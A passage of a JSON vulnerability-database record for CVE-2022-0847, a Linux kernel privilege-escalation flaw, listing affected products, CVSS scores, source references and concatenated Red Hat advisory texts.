                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:codeready_linux_builder:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ovirt:ovirt-engine:4.4.10.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_lpe9403_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_lpe9403:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2022-0847",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-0847",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202203-522",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-0847",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n\n5. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.8 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\nBug fix:\n\n* RHACM 2.3.8 images (Bugzilla #2062316)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2062316 - RHACM 2.3.8 images\n\n5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security and bug fix update\nAdvisory ID:       RHSA-2022:0819-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:0819\nIssue date:        2022-03-10\nCVE Names:         CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 \n                   CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 \n                   CVE-2022-22942 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\nRed Hat Enterprise Linux for Real Time (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: improper initialization of the \"flags\" member of the new\npipe_buffer (CVE-2022-0847)\n\n* kernel: Use After Free in unix_gc() which could result in a local\nprivilege escalation (CVE-2021-0920)\n\n* kernel: local privilege escalation by exploiting the fsconfig syscall\nparameter leads to container breakout (CVE-2021-4154)\n\n* kernel: possible privileges escalation due to missing TLB flush\n(CVE-2022-0330)\n\n* kernel: remote stack overflow via kernel panic on systems using TIPC may\nlead to DoS (CVE-2022-0435)\n\n* kernel: cgroups v1 release_agent feature may allow privilege escalation\n(CVE-2022-0492)\n\n* kernel: failing usercopy allows for use-after-free exploitation\n(CVE-2022-22942)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel symbol \u0027__rt_mutex_init\u0027 is exported GPL-only in kernel\n4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)\n\n* kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree\n(BZ#2045589)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation\n2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout\n2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush\n2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation\n2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS\n2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation\n2060795 - CVE-2022-0847 kernel: improper initialization of the \"flags\" member of the new pipe_buffer\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-0920\nhttps://access.redhat.com/security/cve/CVE-2021-4154\nhttps://access.redhat.com/security/cve/CVE-2022-0330\nhttps://access.redhat.com/security/cve/CVE-2022-0435\nhttps://access.redhat.com/security/cve/CVE-2022-0492\nhttps://access.redhat.com/security/cve/CVE-2022-0847\nhttps://access.redhat.com/security/cve/CVE-2022-22942\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-002\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl\nISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k\nord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t\n/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG\nIODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F\nGbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ\nypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW\nIOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm\nQfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j\nKIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE\nX1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w\nnEhPbkKSmMY=\n=CLN6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "166230",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166258",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166229",
        "trust": 2.4
      },
      {
        "db": "SIEMENS",
        "id": "SSA-222547",
        "trust": 1.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-167-09",
        "trust": 1.4
      },
      {
        "db": "PACKETSTORM",
        "id": "176534",
        "trust": 1.0
      },
      {
        "db": "JVN",
        "id": "JVNVU99030761",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166516",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166280",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166305",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166812",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166241",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166569",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022032843",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031421",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022030808",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022042576",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031308",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031036",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1027",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0965",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.2981",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1677",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1405",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0944",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030042",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030060",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50808",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166789",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166282",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166281",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166265",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166264",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
